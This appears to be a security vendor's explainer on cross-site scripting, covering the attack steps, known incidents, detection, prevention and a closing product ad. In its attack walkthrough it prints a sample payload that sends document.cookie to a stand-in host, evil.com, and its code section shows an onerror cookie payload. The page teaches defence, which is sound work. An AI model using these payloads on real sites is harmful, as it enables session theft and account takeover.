Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) is an injection attack where malicious scripts are injected into trusted websites. When a user visits the compromised page, the script executes in their browser, allowing attackers to steal session tokens, redirect users, deface content, or perform actions on behalf of the victim.
How Cross-Site Scripting (XSS) Works
XSS exploits the trust a user's browser places in content received from a website. When an application includes untrusted data in its output without proper encoding, attackers can inject executable scripts.
Find an unsanitized output
The attacker identifies a point where user-supplied data is reflected in HTML without proper encoding — a search result, comment field, URL parameter, or error message.
Inject a script payload
A malicious script tag or event handler is crafted, such as <script>document.location='https://evil.com/?c='+document.cookie</script>, and submitted through the vulnerable input.
Victim triggers execution
When a victim loads the page containing the injected script (via a crafted link, stored comment, or manipulated DOM), their browser executes the malicious code as if it were legitimate site content.
Exploit the session
The script steals cookies, session tokens, or credentials and sends them to the attacker's server. It can also modify page content, redirect users, or perform API calls on behalf of the victim.
Real-World Examples
Samy worm (MySpace)
A stored XSS worm spread across MySpace, adding over 1 million friends to the attacker's profile in under 24 hours. It was the fastest-spreading worm of all time.
British Airways Magecart attack
Attackers injected a malicious script into BA's payment page, stealing credit card data from 380,000 transactions over 15 days. BA was fined £20 million by the ICO.
Fortnite SSO vulnerability
An XSS vulnerability in Epic Games' authentication flow could have allowed attackers to take over any Fortnite player account, affecting over 200 million users.
Impact & Risk Assessment
XSS attacks can lead to session hijacking, account takeover, credential theft, defacement, malware distribution, and phishing. Stored XSS is particularly dangerous as it affects every user who views the compromised page. In e-commerce contexts, XSS enables Magecart-style attacks that silently steal payment data at scale.
How to Detect Cross-Site Scripting (XSS)
Implement Content Security Policy (CSP) headers and monitor for violations. Review server logs for script tags and encoded payloads in request parameters. Use browser developer tools to inspect for unexpected inline scripts. Deploy WAF rules targeting common XSS vectors. Monitor DOM mutations for unexpected script injections. Look for encoded variants: %3Cscript%3E, <script>, and JavaScript event handlers in unexpected contexts.
How to Prevent Cross-Site Scripting (XSS)
Encode all user-supplied output using context-aware encoding (HTML entity, JavaScript, URL, CSS encoding). Implement a strict Content Security Policy (CSP) that disallows inline scripts. Use HTTPOnly and Secure flags on session cookies to prevent JavaScript access. Validate and sanitize input on the server side. Use modern frameworks with built-in auto-escaping (React, Angular, Vue). Apply the X-XSS-Protection header as a defense-in-depth measure.
Code Examples
<!-- VULNERABLE: user input rendered directly -->
<div class="search-results">
<p>Results for: ${userQuery}</p>
</div>
<!-- Attacker input: <img src=x onerror=alert(document.cookie)> -->
<!-- Renders executable HTML in the victim's browser -->
// Express.js — set strict CSP header
app.use((req, res, next) => {
res.setHeader(
'Content-Security-Policy',
"default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'"
);
next();
});
PowerWAF automatically blocks Cross-Site Scripting (XSS) at the edge.
Deploy in minutes. No code changes required. Free plan available.
Free plan spots are limited